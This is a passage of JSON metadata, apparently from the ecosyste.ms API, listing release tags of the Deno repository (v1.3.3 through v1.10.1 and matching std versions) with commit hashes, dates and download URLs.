o/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno